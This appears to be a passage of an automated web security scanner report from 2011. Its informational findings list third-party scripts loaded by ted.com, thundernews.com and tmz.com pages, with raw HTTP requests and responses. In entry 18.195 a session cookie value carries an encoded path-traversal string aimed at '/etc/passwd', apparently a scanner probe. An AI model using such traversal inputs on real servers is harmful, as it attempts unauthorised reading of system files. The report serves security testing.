<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js"></script>
...[SNIP]...

18.185. http://www.ted.com/webcast/archive/event/ibmwatson  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ted.com
Path:   /webcast/archive/event/ibmwatson

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /webcast/archive/event/ibmwatson HTTP/1.1
Host: www.ted.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/smarter-answers-for-a-smarter-planet.html

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:54:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Content-Length: 11257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js"></script>
...[SNIP]...

18.186. http://www.thundernews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thundernews.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?GTSE=goog&GTKW=NNTP%20server&gclid=CIyWi8vAoqsCFQhrgwodLzuGZg HTTP/1.1
Host: www.thundernews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 18853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>ThunderNews</tit
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.187. http://www.thundernews.com/signup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thundernews.com
Path:   /signup.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /signup.php HTTP/1.1
Host: www.thundernews.com
Proxy-Connection: keep-alive
Referer: http://www.thundernews.com/?GTSE=goog&GTKW=NNTP%20server&gclid=CIyWi8vAoqsCFQhrgwodLzuGZg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ivkp48lpbk512tliksia20ffj1; __utma=64644586.2073731114.1316219532.1316219532.1316219532.1; __utmb=64644586; __utmc=64644586; __utmz=64644586.1316219532.1.1.utmgclid=CIyWi8vAoqsCFQhrgwodLzuGZg|utmccn=(not+set)|utmcmd=(not+set)|utmctr=nntp+server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 57707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>ThunderNews</tit
...[SNIP]...
</SCRIPT>-->
           <script language="JavaScript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
...[SNIP]...
<!-- Begin Go Analytics -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.188. https://www.thundernews.com/billinginfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thundernews.com
Path:   /billinginfo.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /billinginfo.php?currency=USD&pricepointid=207 HTTP/1.1
Host: www.thundernews.com
Connection: keep-alive
Referer: http://www.thundernews.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ivkp48lpbk512tliksia20ffj1; ck_tn_user_country=-; __utma=64644586.2073731114.1316219532.1316219532.1316219532.1; __utmb=64644586; __utmc=64644586; __utmz=64644586.1316219532.1.1.utmgclid=CIyWi8vAoqsCFQhrgwodLzuGZg|utmccn=(not+set)|utmcmd=(not+set)|utmctr=nntp+server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:36:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 62691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>ThunderNews</tit
...[SNIP]...
</SCRIPT>-->
                       <script language="JavaScript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
...[SNIP]...
<!-- Begin Go Analytics -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.189. http://www.tmz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:51:55 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 132529
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/"
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
<!-- end -->


<script src="http://cdnapi.kaltura.com/p/591531/sp/59153100/embedIframeJs/uiconf_id/4886821"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...

18.190. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=467a26e36b344d031207fb454f356be4&rdid=231534154&type=YLD_def_ch&in-site=true&req_id=da23b34cfa8657c71e50520363d1bbbe&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&refPub=347&prs=false&scp=false&version=42206&idx=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero3; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DMichaele%252520Salahi%252520--%252520%252526%252523039%25253BWild%252520Sex%252526%252523039%25253B%252520Claims%252520with%252520Journey%252520Guitarist%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:18 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff7c43ff78cfa8bd07; expires=Sun, 20-Feb-2028 01:00:18 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112256
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.191. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero2; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DRon%252520Artest%252520--%252520Name%252520Change%252520Official%252520...%252520Say%252520Hello%252520to%252520World%252520Peace%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-ch%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:47 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:47 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff1d45dc9035b97879; expires=Sun, 20-Feb-2028 00:58:47 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115459
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.192. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero3; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253D%252526%252523039%25253BNCIS%252526%252523039%25253B%252520Actor%252520--%252520Dead%252520Mother%252520Insult%252520Led%252520to%252520Violence%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-i%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:46 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:46 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562effac2cf8f69d82c880; expires=Sun, 20-Feb-2028 01:00:46 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115860
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.193. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_sq=wbrostmz%3D%2526pid%253DCelebrity%252520Gossip%252520%25257C%252520Entertainment%252520News%252520%25257C%252520Celebrity%252520News%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:56:17 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:56:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:56:17 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112027
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.194. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_sq=wbrostmz%3D%2526pid%253DNancy%252520Grace%252520--%252520RUMPSHAKIN%252526%252523039%25253B%252520in%252520the%252520TMZ%252520Ballroom%252521%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petit_2%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:11 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:11 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:58:11 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 111374
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.195. http://www.tmz.com/reset-password/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /reset-password/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reset-password/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero1; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DSign%252520In%252520%25253A%252520TMZ%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/reset-password/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:03:54 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:03:55 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; expires=Sun, 20-Feb-2028 01:03:54 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 57490
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
<!-- Include google_services.js -->
<script language="javascript" src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...
</script>
